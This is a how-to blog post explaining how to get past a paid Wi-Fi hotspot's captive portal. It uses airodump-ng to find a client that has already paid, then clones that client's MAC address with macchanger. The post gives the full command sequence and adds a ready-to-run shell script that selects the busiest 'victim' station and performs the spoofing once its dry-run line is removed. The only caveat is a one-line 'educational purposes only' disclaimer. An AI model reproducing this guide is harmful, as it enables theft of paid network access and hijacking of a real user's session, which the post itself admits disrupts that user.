How to Bypass Wi Fi HotSpot Access Control By Session Stealing

In my previous posts I explained what session stealing is. Now let us see how to do it with BackTrack Linux to bypass a Wi-Fi hotspot's access control. A paid hotspot is normally an open network: anybody can associate and get an IP address, but a captive portal blocks traffic until you pay, and it remembers who has paid by the client's MAC address. So the whole technique comes down to finding a client that is already authorized and cloning its MAC address with macchanger.

Step 1:
Boot into BackTrack Linux. Start Wireless Assistant and confirm there is a wireless network around, then click "Connect" on that network. You will associate, but the hotspot won't let you through because you are not a paid user: it opens a browser and asks you to pay for usage.

Close it.

Step 2: Preparing the Wi-Fi Interface (rausb0)

There are several ways to find a client that is already authorized. The simplest is a ping scan of the hotspot subnet from BackTrack, since you can associate and get an address before paying. Here I demonstrate airodump-ng instead, which is completely passive and is a useful extra method for you to learn.

Open a shell (Konsole) in BackTrack. We have to put the wireless interface into monitor mode.

Type:

ifconfig -a

You will see the list of network interfaces. In my list I see "rausb0", which is the interface I want to use, so bring it up:

ifconfig rausb0 up

Now the interface is up and we have to switch it to monitor mode:

iwconfig rausb0 mode monitor

Note that many drivers refuse to change mode while the interface is up. If the command fails, run ifconfig rausb0 down first, change the mode, and bring it back up. Confirm the mode with:

iwconfig

The output for rausb0 should now say Mode:Monitor. Next we start airodump-ng.

Step 3: Start airodump-ng

In the same shell, typing airo and pressing Tab lists the aircrack-ng suite tools that are installed; the one we need is airodump-ng. Start it on the monitor interface:

airodump-ng rausb0

The top half of the screen lists every access point in range (BSSID and ESSID); the bottom half lists stations (clients). We have to find the MAC address of a client that is already on the hotspot network.

Step 4: Capturing the MAC Address of a Connected User (for Spoofing)

You will see a list of access points around you. The ESSID (network name) is the last column of each line, and that is how you pick out the hotspot you want.

E.g. you will find attwifi if you are on the AT&T hotspot, as shown in the following image.

[Image: airodump-ng output with the attwifi access point and its BSSID highlighted]

Copy the BSSID (the MAC address in the first column) of that hotspot and use it to filter airodump-ng to that one access point:

airodump-ng --bssid xx:xx:xx:xx:xx:xx rausb0 (replace the xx with the copied BSSID)

Adding -c followed by the access point's channel number stops airodump-ng from channel hopping, so it sees far more of that network's traffic. It will take a little while to collect traffic; then the station list shows each client associated to that access point with its packet count. Pick the station with the most packets flowing (more than 30-40, say): an active client is the one most likely to have paid and passed the captive portal, whereas a client showing a handful of packets may still be stuck on the payment page just like you.

Copy the MAC address of this station (the first column of the station list, not the BSSID column).

Now that you have the address you are going to adopt as your own MAC address, stop airodump-ng (Ctrl-C) and put the interface back into managed mode from monitor mode.

If you are using a USB dongle, simply unplug it, change the MAC address as described in the next step, and plug it back in. If your card is not a USB dongle, bring the interface down and switch the mode instead:

ifconfig rausb0 down
iwconfig rausb0 mode managed

(macchanger needs the interface down anyway, so don't bring it up yet.)
Step 5: Changing the MAC Address

In your shell, run macchanger to change the MAC address:

macchanger -m xx:xx:xx:xx:xx:xx rausb0 (replace the xx with the station MAC address you copied)

macchanger prints the current MAC address and the new, faked MAC address.

Now plug the USB dongle back in, or, if you used the command to take the interface down, bring it back up:

ifconfig rausb0 up

Your MAC address has now been changed. You can check it by running ifconfig in the console; the HWaddr shown for rausb0 should be the copied address. Keep in mind that the paying client is still on the network: as long as both of you use the same MAC address on the same access point you will interfere with each other, and the legitimate user may notice dropped connections.
Step 6: Connecting to the Wi-Fi Network

You have now bypassed the hotspot's access control by taking over the paid client's session, and you can connect to the hotspot as follows:

1. Open Wireless Assistant.
2. Select the network.
3. Hit Connect.

Because the DHCP server keys its leases on the client hardware address, you will usually also be handed the same IP address as the paid client, and the captive portal, which only sees that MAC (and IP), lets your traffic through without showing the payment page.

And you're done!
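The procedure in steps 3 to 5 can be scripted. The script below is an added example and is not part of the original post: it parses the CSV file that airodump-ng writes (airodump-ng -w scan --output-format csv rausb0 produces scan-01.csv), looks up the hotspot's BSSID from its ESSID, picks the associated station with the most packets, and then runs the ifconfig/iwconfig/macchanger sequence from Step 5. The capture embedded in the script is a constructed sample in airodump-ng's CSV layout (two sections, access points then stations, separated by a blank line), not a real scan; the interface name rausb0 and the ESSID attwifi are taken from the post. With DRY_RUN=1 it only prints the commands it would run, so it can be tried without a wireless card.

```shell
#!/bin/sh
# Added example (not from the original post): pick an authorised client from an
# airodump-ng CSV capture and clone its MAC address with macchanger.

# Constructed sample capture in airodump-ng CSV format (not a real scan).
SAMPLE_CSV="$(mktemp)"
trap 'rm -f "$SAMPLE_CSV"' EXIT
cat > "$SAMPLE_CSV" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2012-01-01 10:00:00, 2012-01-01 10:05:00,  6,  54, OPN, , ,  -40,      310,      0,   0.  0.  0.  0,   7, attwifi, 
AA:BB:CC:00:00:02, 2012-01-01 10:00:00, 2012-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK,  -70,      120,      0,   0.  0.  0.  0,   8, HomeNet1, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:01, 2012-01-01 10:00:01, 2012-01-01 10:05:00,  -55,       12, AA:BB:CC:00:00:01, 
00:11:22:33:44:02, 2012-01-01 10:00:02, 2012-01-01 10:05:00,  -50,      187, AA:BB:CC:00:00:01, attwifi
00:11:22:33:44:03, 2012-01-01 10:00:03, 2012-01-01 10:05:00,  -62,       95, (not associated), HomeNet1
00:11:22:33:44:04, 2012-01-01 10:00:04, 2012-01-01 10:05:00,  -48,      240, AA:BB:CC:00:00:02, 
EOF

# find_bssid CSV ESSID: print the BSSID of the access point with exactly that ESSID.
# Fields are separated by ", " with variable padding, hence the ", *" separator.
find_bssid() {
    awk -F', *' -v essid="$2" '
        /^Station MAC/ { exit }                   # stop at the station section
        NF >= 14 && $14 == essid { print $1; exit }
    ' "$1"
}

# pick_station CSV BSSID: print the MAC of the station associated to BSSID that
# has the most captured packets (the client most likely to have passed the portal).
# Unassociated stations have "(not associated)" in the BSSID column and are skipped.
pick_station() {
    awk -F', *' -v bssid="$2" '
        /^Station MAC/ { in_stations = 1; next }
        in_stations && NF >= 6 && $6 == bssid && ($5 + 0) > best { best = $5 + 0; mac = $1 }
        END { if (mac != "") print mac }
    ' "$1"
}

# run CMD...: execute the command, or just print it when DRY_RUN=1.
run() {
    if [ "${DRY_RUN:-0}" = 1 ]; then echo "$*"; else "$@"; fi
}

# spoof_mac IFACE MAC: the Step 5 sequence. The interface must be down for both
# the mode change and macchanger, so it is taken down first and raised last.
spoof_mac() {
    run ifconfig "$1" down
    run iwconfig "$1" mode managed
    run macchanger -m "$2" "$1"
    run ifconfig "$1" up
}

# Walk through the procedure against the sample capture without touching any interface.
DRY_RUN=1
AP_BSSID="$(find_bssid "$SAMPLE_CSV" attwifi)"
VICTIM_MAC="$(pick_station "$SAMPLE_CSV" "$AP_BSSID")"
if [ -z "$VICTIM_MAC" ]; then
    echo "no associated station found for $AP_BSSID; capture longer" >&2
else
    echo "attwifi BSSID: $AP_BSSID  busiest client: $VICTIM_MAC"
    spoof_mac rausb0 "$VICTIM_MAC"
fi
```

To use it for real, point find_bssid and pick_station at the CSV written by airodump-ng and drop the DRY_RUN=1 line; the functions print nothing when the ESSID is not in the capture or no client is associated, which is the cue to keep capturing (locked to the hotspot's channel with -c) rather than to clone an empty address.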

Disclaimer: This is for educational purposes only.